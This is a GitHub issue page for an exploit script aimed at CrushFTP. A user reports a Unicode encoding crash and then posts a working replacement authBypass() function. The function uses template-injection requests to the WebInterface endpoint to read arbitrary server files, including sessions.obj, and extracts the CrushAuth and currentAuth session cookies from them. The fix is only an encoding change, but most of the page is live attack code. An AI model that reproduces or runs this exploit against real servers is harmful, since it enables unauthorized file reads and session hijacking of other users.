Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

codec error \ufffd #3

Open
Hina-kari opened this issue May 18, 2024 · 1 comment
Open

codec error \ufffd #3

Hina-kari opened this issue May 18, 2024 · 1 comment

Comments

@Hina-kari
Copy link

Traceback (most recent call last):
File "C:\Users\PC\Downloads\crushed.py", line 267, in
main()
File "C:\Users\PC\Downloads\crushed.py", line 260, in main
extracted_crush_auth, extracted_current_auth = authBypass(target=args.target, crush_auth_cookie=crush_auth_cookie, current_auth_cookie=current_auth_cookie, lfi=args.lfi, session=session)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\PC\Downloads\crushed.py", line 167, in authBypass
f.write(response.text)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.12_3.12.1008.0_x64__qbz5n2kfra8p0\Lib\encodings\cp1252.py", line 19, in encode
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'charmap' codec can't encode character '\ufffd' in position 790: character maps to

@Hina-kari
Copy link
Author

fixed the error

replace authbypass() with this
`def authBypass(target, crush_auth_cookie, current_auth_cookie, session, lfi=None):

    console.print(f"[green][*][/green] Attempting to bypass authentication...")

    url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path={{working_dir}}&names=/a"
    console.print(f"\n[green][+][/green] URL: " + url)
    headers = {
        "Cookie": f"CrushAuth={crush_auth_cookie}; currentAuth={current_auth_cookie}"
    }

    try:
        response = session.post(url, headers=headers, verify=False, allow_redirects=True)
    
        if "{working_dir}" in response.text:
            console.print(f"[red][-][/red] Bypass was not successful, server is not vulnerable.")
            console.print(f"[red][-][/red] Response: " + response.text)
            exit(1)

        if response.status_code == 200 and response.text != "":
            console.print(f"[green][+][/green] Extracted response: \n" + response.text)

            root = ET.fromstring(response.text)
            response_text = root.find('response').text
            matches = re.findall(r'file:(.*?)(?=\n|$)', response_text)            
            if matches:
                install_dir = matches[-1].strip()
                console.print(f"[green][+][/green] Installation directory of CrushFTP: " + install_dir)
                file_to_read = lfi if lfi else f"{install_dir}sessions.obj"
                console.print(f"[green][+][/green] File to read: " + file_to_read)
                
                url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path=<INCLUDE>{file_to_read}</INCLUDE>&names=/a"
                console.print(f"\n[green][+][/green] Attempting to extract {file_to_read}...")
                console.print(f"\n[green][+][/green] URL: " + url)
                response = session.post(url, headers=headers, verify=False, allow_redirects=True)

                if response.status_code == 200 and response.text != "":
                    console.print(f"[green][+][/green] Successfully extracted {file_to_read}")
                    escaped_text = response.text.replace("[", "\\[").replace("]", "\\]")

                    console.print(f"[green][+][/green] Extracted response: \n" + escaped_text)
                    if not lfi or lfi == f"{install_dir}sessions.obj":
                        extracted_crush_auth = [cookie[:44] for cookie in re.findall(r'CrushAuth=([^;]*)', response.text)]
                        extracted_current_auth = [cookie[:4] for cookie in re.findall(r'currentAuth=([^;]*)', response.text)]

                        console.print(f"\n[green][+][/green] Extracted cookies from {file_to_read}: ")
                        console.print(f"\n[green][+][/green] [yellow2]CrushAuth cookies:[/yellow2] " + ', '.join(extracted_crush_auth))
                        console.print(f"\n[green][+][/green] [yellow2]currentAuth cookies: [/yellow2]" + ', '.join(extracted_current_auth))
                        with open (f"sessions.obj", "w", encoding="utf-8") as f:
                            f.write(response.text)
                        return extracted_crush_auth, extracted_current_auth
                return None, None
            else:
                print(f"[red][-][/red] Failed to extract file value")
                return None
            
    except requests.exceptions.RequestException as e:
        console.print(f"[red][-][/red] Failed to bypass authentication")
        console.print(f"[red][-][/red] Error: " + str(e))
        exit(1)`

changed the encoding file to UTF-8

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Hina-kari